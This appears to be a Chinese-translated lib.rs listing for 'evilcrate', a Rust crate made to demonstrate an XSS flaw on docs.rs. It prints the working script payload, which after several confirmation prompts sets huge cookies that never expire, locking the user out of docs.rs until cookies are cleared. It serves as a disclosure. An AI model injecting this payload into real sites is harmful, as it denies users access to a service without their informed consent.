Lib.rs

#漏洞 #cookies #clear #xss #demonstration #click #afterwards

evilcrate

演示 XSS 漏洞。之后清除 cookies。

Philip Peterson 编写

3 个版本

0.1.2 2021 年 3 月 21 日
0.1.1 2021 年 3 月 21 日
0.1.0 2021 年 3 月 21 日

#5 in #demonstration

Download history 1/week @ 2024-02-15 3/week @ 2024-02-22 1/week @ 2024-02-29 27/week @ 2024-03-28 27/week @ 2024-04-04

每月 54 次下载

MIT 许可证

3KB

🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥

这个 crate 展示了 docs.rs 的 XSS 漏洞。为了测试,点击下面的链接。为了之后能够访问 docs.rs,您需要清除 cookies。

🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥

<script> function bootstrap() { const doc1 = '这是一个安全漏洞(XSS)的演示。点击 CANCEL 任何时候终止。'; const doc2 = '警告:如果您继续,您将无法访问 docs.rs。如果您不希望发生这种情况,请点击 CANCEL。'; const doc3 = '警告:继续后,您需要清除浏览器 cookies 才能访问 docs.rs。'; if (!confirm(doc1) || !confirm(doc2) || !confirm(doc3)) { return; } if (prompt('输入 "I understand what I need to do" 以继续:') !== "I understand what I need to do") { return; } let z = 'z'; for (let i = 0; i < 4000; i++) { z = z + 'z'; } function setCookie(name) { document.cookie = name + '=' + z + '; expires=Fri, 31 Dec 9999 23:59:59 GMT; Path=/'; } ['a','b','c','d','e','f','g','h'].forEach(setCookie); window.location.reload(); } </script>

无运行时依赖